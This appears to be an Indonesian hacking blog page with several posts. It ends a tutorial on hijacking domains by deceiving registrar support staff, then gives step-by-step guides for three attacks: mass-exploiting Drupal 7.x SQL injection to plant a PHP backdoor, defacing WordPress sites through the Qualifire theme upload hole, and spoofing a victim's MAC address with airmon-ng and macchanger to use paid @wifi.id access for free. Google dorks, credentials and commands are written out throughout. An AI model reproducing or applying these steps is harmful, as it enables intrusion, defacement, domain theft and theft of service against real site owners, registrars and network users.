    Fyuuhhhhh ... :p

    saya cek via proxy, domain nya sudah mengarah ke ns baru :D .



    Kira kira begitulah , tutorial DNS Hijacking via Social Engineering :D .

    Alur nya tetap .

    Selesaikan via chat > gagal , via mailer > gagal , pelajari dari kesalahan pertama. tunggu kira kira setegah hari. kembali chat cs nya . karena biasanya sudah ganti cs. jadi dia tidak tau kalau sebelumnya kita sudah chat disitu.

    Begitu seterus nya .

    Tingkat keberhasilan teknik ini kalau saya dulu adalah 100% :D

    Inti nya, yakin kan cs kalau kita adalah pemilik domain tersebut, APAPUN CARANYA .

    beberapa chat diatas adalah contoh dari yang sudah pernah saya lakukan, meskipun ada beberapa trik lagi yang belum saya beberkan , karena masih sedikit yang tau, masih privat lah yaaa :D . Intinya saya kasih contoh biar kalian kembangkan , explore your brain bro :)



    Tapi tetap, kadang saya kok tdk suka kalau ada yang nyeletuk " main kok dns hijack , anak sd juga bisa '

    coba balik tanya " yaudah dong situ kan sudah lulus sd, redeface bisa ? "

    saya yakin dia langsung diam :)

    Cobalah untuk menghargai ilmu , karena saat kata kata tidak disetarakan dengan skill, itu hanya akan membuat malu diri sendiri .

    Teknik hacking itu tidak hanya SQLi, LFI, CSRF dll. DNS Hijacking juga termasuk .

    Dan untuk mengelabuhi cs registrar itu juga ada tingkatannya, butuh skill. Tidak semata mata kita bilang "tolong ganti dns domain ini ke ns bla bla bla.. " . Gak sesimpel itu kok . maka nya kadang saya kok ngakak kalo liat log chat seseorang yang mengaku sebagai saya lalu chat ke IDW*bhost, meminta pergantian dns . no skill, terlihat seperti tanpa rencana :D . Bahkan ada transkripsi chat dari rumahweb ada yang merequest pergantian dns domain madura-cyber.org . what the hell -_- . Itu domain gak di cek whois dulu ya ? apa kenal nya cuma sama rumahweb doang :v



    Saran untuk pihak registrar :

    1. Jangan pernah melayani perubahan dns via live chat, fungsi live chat hanya untuk menaggapi pertanyaan seputar produk.

    2. Jika harus lewat live chat, pastikan untuk meminta password member area untuk verifikasi, jika tidak diberi, JANGAN pernah melayani pergantian dns , apapun alasannya .

    3. Jika permintaan dilakukan via email, selalu mintalah verifikasi dengan menyuruh mereply kembali email verifikasi sebagai bukti kalau email tersebut dikirim lewat email asli, bukan MAILER. Jika pengirim belum melakukan verifikasi sesuai yang diminta, jangan pernah mengganti dns domain yang diminta :D



    Oke sekian coretan saya, semoga bermanfaat :D



    NB : sebelum saya publish tulisan saya disini, saya sudah contact ke beberapa pihak registrar indo tentang proof of concept dari social engineering dan beberapa sudah menanggapi :D .

    Bukan maksud cari nama sih :) saya cuma pengen pihak penyedia domain di Indonesia lebih baik, dan lebih "pintar" .




    Read more
    Thursday, June 11, 2015
    Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

    Oke kali ini mau share exploit yang lumayan masih rame. yaitu exploit SQL Injection pada CMS Drupal 7.x dan cara upload shell nya. Oke langsng saja ya tanpa basa basi. Berikut tutor nya.



    Google dorks :

    "powered by drupal"

    Tools :

    Drupal Exploit



    Langkah Langkah :

    Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost.





    Anggap sudah mempunyai target vuln.

    Masukkan url ( tanpa http:// ) dan klik "suck it ! "





    Masuk ke url

    http://site.com/user/login 

    dan masukkan

    user : fuckyou

    pass : admin

    Dan..





    Lalu masuk ke

    http://site.com/node/add/article

    Ubah format nya ke PHP Code

    masukkan source backdoor nya .



    Dan buka shell nya di lokasi artikel berada .





    Yupp... sekian tutor kali ini, semoga bermanfaat.

    Hargai penulis dengans elalu mencantumkan link sumber saat melakukan copy paste :)
    Read more
    Friday, June 5, 2015
    Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability

    Yuppp.. lama ya tidak share exploit deface. Kali ini saya mau share tutorial deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability . Exploit nya sudah lama sih sebenarnya, namun gak tau kenapa sekarang "bersemi kembali" . Oke gak usah lama lama , langsung saja .

    Bahan :

    HTML Exploit : download

    Google Dorks :

    inurl:"/wp-content/themes/qualifire"

    Use your brain, bitch !

    Vuln :

    /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php



    Simpan exploit di atas dengan format .html. Jangan lupa ganti url nya dengan url target.

    Setelah itu buka file exploit nya di browser.





    Shell kalian akan berada di localhost/shell.php

    Karena langsung berada di public_html, jika kalian hanya ingin deface, bisa langsung pload script.





    Sekian tutor Deface Wordpress dengan Exploit Themes Qualifire File Upload Vulnerability kali ini, happy exploiting.
    Read more
    Sunday, May 31, 2015
    Hack @wifi.id Menggunakan BackBox Linux

    Jadi cerita nya kemaren beli voucher @wifi.id di telkom, karena ngerasa eman ane balik lagi ke telkom tadi, sampe batas waktu 24jam gak disconnect, karena emang ane gak logout. Tapi pe'a nya windows tiba tiba nge restart sendiri dan yupp, harus login . Berhubung ane lagi gak bawa duit, dan masih ada yang harus didownload, ane coba ngakali internet gratis dengan numpang di mac address orang.

    Sebenarnya yag kita lakukan hanyalah memanipulasi mac address kita dengan memanfaatkan tools airmon-ng yang memang sudah terinstall di OS Linux pentest macam BackBox maupun Kali.

    Pertama, kita cek dulu interface yang kita gunakan.

    root@system:/home/jackwilder# airmon-ng

    Di kasus saya, yang saya gunakan adalan wlan0 .

    maka masukkan command

    root@system:/home/jackwilder# airmon-ng start wlan0

    ini untuk menyalakan interface wlan0

    Lihat screenshhot dibawah :




    Image
    Hack @wifi.id

    Lanjuuttt...

    root@system:/home/jackwilder# airodump-ng mon0

    Untuk memonitori siapa saja yang konek ke @wifi.id


    Image

    Dari screenshoot diatas terlihat SSID dari @wifi.id adalah 3C:0E:23:73:F7:10

    Di daftar bawahnya, cari station yang connect ke SSID 3C:0E:23:73:F7:10 .

    * cari yang frames nya paling tinggi.

    Di sini saya dapat mac korban dengan frames paling tinggi : B8:EE:65:32:85:E3



    Tekan Ctrl + C .

    root@system:/home/jackwilder# airmon-ng stop mon0

    ini untuk mematikan interface mon0 .

    root@system:/home/jackwilder# ifconfig wlan0 down

    untuk mematikan service wlan0

    Selanjutnya masukkan perintah :

    root@system:/home/jackwilder# macchanger -m B8:EE:65:32:85:E3 wlan0

    B8:EE:65:32:85:E3 , itu mac address korban , ganti dengan mac yang menjadi korbanmu.

    Lalu masukkan command

    root@system:/home/jackwilder# ifconfig wlan0 up



    SS :


    Image



    Sekarang sambungkan ke ssid @wifi.id .

    Buka browser, dan b!ng0 .

    Tidak perlu login.

    xD





    Gunakan trik ini hanya jika kalian sedang kere, gak punya duit, kepepet, gak bisa beli voucher.

    Kasihan orang lain yang beli , kita ngerampok bandwith nya.

    Lagian cuma 5000 doang kok.



    Sekian tutorial kali ini semoga bermanfaat.


    Read more